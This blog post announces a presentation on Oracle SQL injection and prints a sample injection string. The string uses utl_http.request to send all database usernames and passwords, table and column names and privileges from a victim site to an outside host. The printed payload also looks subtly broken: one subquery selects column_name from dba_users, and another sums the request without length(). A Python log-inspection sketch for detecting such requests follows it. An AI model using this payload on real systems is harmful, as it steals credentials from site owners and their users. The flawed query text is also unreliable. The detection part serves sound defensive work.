I just uploaded the presentation "SQL Injection in Oracle Webapps" to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search for credit card numbers in the database (using dbms_xmlgen), …

Here is one of the sample SQL injection strings from the presentation. With this SQL injection string we get all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause: utl_http.request is evaluated once per row and sends that row's data out in the URL of an HTTP request, length() turns each response into a number, and sum() collapses all rows into the single value the comparison needs.
http://victim.com/order.jsp?id=17' or 1=((select
sum(length(utl_http.request('http://www.orasploit.com/'||
username||'='||password) from dba_users)))+((select
sum(utl_http.request('http://www.orasploit.com/'||
owner||'='||table_name) from dba_tables))+((select
sum(length(utl_http.request('http://www.orasploit.com/'||
owner||'='||table_name||'='||column_name)) from dba_users))
+((select sum(length(utl_http.request(
'http://www.orasploit.com/'||grantee||'='||granted_role) from
dba_role_privs)))+((select
sum(length(utl_http.request('http://www.orasploit.com/'||
grantee||'='||owner||'='||table_name||'='||privilege||'='||
grantable) from dba_tab_privs)))--
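
A detection-side sketch for the string above, added here as an example and not taken from the presentation: it URL-decodes each query parameter of a request line and flags the combination the post relies on, a utl_http.request call together with a subselect or a DBA_* dictionary view. The log lines, the host collector.example and the function name inspect_request are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Patterns taken from the injection string in the post.
OOB_CALL = re.compile(r"utl_http\s*\.\s*request\s*\(")
SUBSELECT = re.compile(r"\(\s*select\b")
DICT_VIEW = re.compile(r"\bdba_(?:users|tables|role_privs|tab_privs)\b")

# Constructed request lines as they would appear in a web access log.
SAMPLE_REQUESTS = [
    "GET /order.jsp?id=17 HTTP/1.1",
    "GET /order.jsp?id=17%27+or+1%3D((select+sum(length(utl_http.request(%27http%3A%2F%2Fcollector.example%2F%27%7C%7Cusername)))+from+dba_users))-- HTTP/1.1",
    "GET /search.jsp?q=utl_http+documentation HTTP/1.1",
    "GET /order.jsp?id=17+and+1%3D(select+count(*)+from+dba_tables) HTTP/1.1",
]

def inspect_request(request_line):
    """Return (parameter, verdict, evidence) tuples for one request line."""
    try:
        _method, rest = request_line.split(" ", 1)
        target, _proto = rest.rsplit(" ", 1)  # tolerates raw spaces in the target
    except ValueError:
        return [("<request>", "malformed", [])]
    findings = []
    # parse_qsl percent-decodes names and values and turns '+' into a space.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        text = value.lower()
        oob = bool(OOB_CALL.search(text))
        sub = bool(SUBSELECT.search(text))
        views = sorted(set(DICT_VIEW.findall(text)))
        evidence = (["utl_http.request call"] * oob
                    + ["parenthesised subselect"] * sub + views)
        if oob and (sub or views):
            verdict = "out-of-band-exfiltration"
        elif sub:
            verdict = "sql-injection-probe"
        else:
            continue  # a lone keyword (e.g. a documentation search) is not flagged
        findings.append((name, verdict, evidence))
    return findings

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(inspect_request(line) or "clean", "<-", line[:60])
```

Request-side matching only covers what reaches the access log; outbound HTTP connections from the database host to an unfamiliar destination are the complementary signal.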